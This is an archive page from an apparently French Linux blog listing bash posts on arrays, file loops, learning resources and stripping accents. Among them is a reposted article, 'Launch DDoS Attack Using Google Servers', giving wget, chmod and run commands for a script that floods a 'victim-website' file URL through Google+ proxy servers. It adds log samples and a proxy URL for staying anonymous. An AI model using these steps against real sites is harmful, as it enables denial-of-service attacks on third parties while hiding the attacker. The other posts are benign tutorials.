Archive

Articles taggués ‘bash’

Using Bash Arrays with Examples

13/03/2019 Comments off

bash-scripting-32-638Arrays can be a useful tool when coding your bash scripts.  The simplest way that I can define an array is to state that an array is a variable for a multi-instance dataset.

For example, a variable is used when there is a single value from a dataset like the IP Address of a server.  However, an array can be used to store all of the IP Addresses in your server room.

Speaking of IP Addresses and bash arrays, my last article (Detect and Block WordPress Brute Force Login Attacks) includes a script which is an example of how an array can be used in bash scripting.

Because arrays can be so useful in bash scripting, I thought that I would put together the following article detailing ways of Using Bash Arrays with Examples.

Initializing Bash Arrays or Assigning Values to Arrays

For arrays to be useful, we need to be able to assign values to them.  We assign values to an array by listing the array along with its instance number as shown below.  This method will assign each instance of the array one by one.

#!/bin/bash
myarray[0]=Hello
myarray[1]=World,
myarray[3]=Happy
myarray[4]=Friday

# Display all instances of the array
echo ${myarray[*]}

We can see above that in addition to being able to assign the values one by one, we can reference all array instances with an asterisk (*).  Another way to display all instances of the array is to use the following “echo ${myarray[@]}”

We run the script and get:

$ ./arrays.sh
Hello World, Happy Friday

We can also retrieve individual instances of an array by specifying the individual array instance number.  We modify the above script slightly to retrieve a couple of the instances.

#!/bin/bash
myarray[0]=Hello
myarray[1]=World,
myarray[3]=Happy
myarray[4]=Friday

# Display all instances of the array
echo ${myarray[0]} ${myarray[4]}

We run the script again and we get:

$ ./arrays.sh
Hello Friday

Lire la suite…

Launch DDoS Attack Using Google Servers with +DDoS Bash Script

09/03/2019 Comments off

DDoS-Using-Google+-Servers-HackersGarageRecently we wrote about ApacheKiller that freezes Victim Server in seconds. While this new findings by IHTeam express that Google+ Servers can be use for DDoS attack. Lets talk about this ant script, Hey.. but it is worthy.

How DDoS Attack Using Google+ Servers works?

When you post a URL on your Google+ status it fetches URL Summary (It includes Image + Short description) using Google+ Proxy Servers.

Advisory report says;  vulnerable pages are “/_/sharebox/linkpreview/“  and “gadgets/proxy?

So if you send multiple parallel requests with a big number e.g 1000 that can be turn into DDoS attack using Google+ Servers huge bandwidth.

How to use DDoS script to launch a DDoS attack Using Google+ Servers?

Download :
wget static.hackersgarage.com/ddos-using-google-servers.sh.hackersgarage.com

Make it shorter :
mv ddos-using-google-servers.sh.hackersgarage.com ddos.sh

Make it executable :
chmod u+x ddos.sh

Example of Usage :
./ddos.sh http://www.victim-website.com/some-file-url/file-name.mp3 1000

Now, lets look at this example :
It is recommended to find a full path to some big file which is downloadable without requesting for CAPTCHA.

e.g http://www.victim-website.com/some-file-url/file-name.mp3

NOTE : Make sure your workstation is capable to handle this huge number else your workstation will freeze and you will have to force fully restart your own workstation ?

e.g 1000 is very big number.

You will see anonymous source instead of Real Source IP:
See sample apache webserver log below

209.85.228.85 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.88 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.228.90 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.91 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.81 - - [31/Aug/2011:15:34:18 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.228.86 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
74.125.152.84 - - [31/Aug/2011:15:34:21 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
74.125.152.81 - - [31/Aug/2011:15:34:33 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"

You can also access it in browser to remain anonymous using below example URL (replace URL with your own choice) :

https://images1-focus-opensocial.googleusercontent.com/gadgets/proxy?url=http://www.Hackersgarage.com&container=none

Source: hackersgarage.com

Learning bash scripting for beginners

29/12/2018 Comments off

Bash (Bourne-Again SHell) is a Linux and Unix-like system shell or command language interpreter. It is a default shell on many operating systems including Linux and Apple OS X. Today, we’ll see how to quickly learn scripting.

If you have always used a graphic user interface like KDE or Gnome or MS-Windows or Apple OS X, you are likely to find bash shell confusing. If you spend some time with the bash shell prompt and it will be difficult for you to go back.

learn-bash

Here are a list of tutorials and helpful resources to help you learn bash scripting and bash shell itself.

Lire la suite…

Categories: Système Tags: , , ,

Bash Shell Loop Over Set of Files

14/12/2018 Comments off

bash shell loopBash Shell Loop

How do I run shell loop over set of files stored in a current directory or specified directory?

You can use for loop easily over a set of shell file under bash or any other UNIX shell using wild card character.

Syntax

The general syntax is as follows:

for f in file1 file2 file3 file5
do
 echo "Processing $f"
 # do something on $f
done

You can also use shell variables:

FILES="file1
/path/to/file2
/etc/resolv.conf"
for f in $FILES
do
	echo "Processing $f"
done

You can loop through all files such as *.c, enter:

$ for f in *.c; do echo "Processing $f file.."; done

Lire la suite…

Categories: Système Tags: , , ,

Bash : Suppression des accents, cédilles, etc

28/11/2018 Comments off
Comment supprimer les accents, cédilles, etc, dans une chaine de caractères ?

Méthode classique : la substitution

La suppression des caractères accentués et autres cédilles peut être effectuée, en Bash, en utilisant “sed” ou “tr” :

fhh@aaricia ~ $ _str="Une chaine avec des é, des Ù, des À, des ç et des œ"
fhh@aaricia ~ $ echo $_str | sed 'y/áàâäçéèêëîïìôöóùúüñÂÀÄÇÉÈÊËÎÏÔÖÙÜÑ/aaaaceeeeiiiooouuunAAACEEEEIIOOUUN/'
Une chaine avec des e, des U, des A, des c et des œ

La méthode est fonctionnelle mais sous entend que tous les caractères à substituer aient été définis. Dans l’exemple, le “œ” n’a pas été remplacé car aucun caractère de remplacement ne lui est alloué.

Autre problème de cette méthode, remplacer une lettre par deux autres tel que “œ” par “oe” ou le “ß” allemand par “ss” nécessite la définition de règles particulières à chaque cas.

Ce sont ces raisons qui nous poussent à éviter cette méthode au profit de la conversion de chaines de caractères. Lire la suite…

Categories: Système Tags: , ,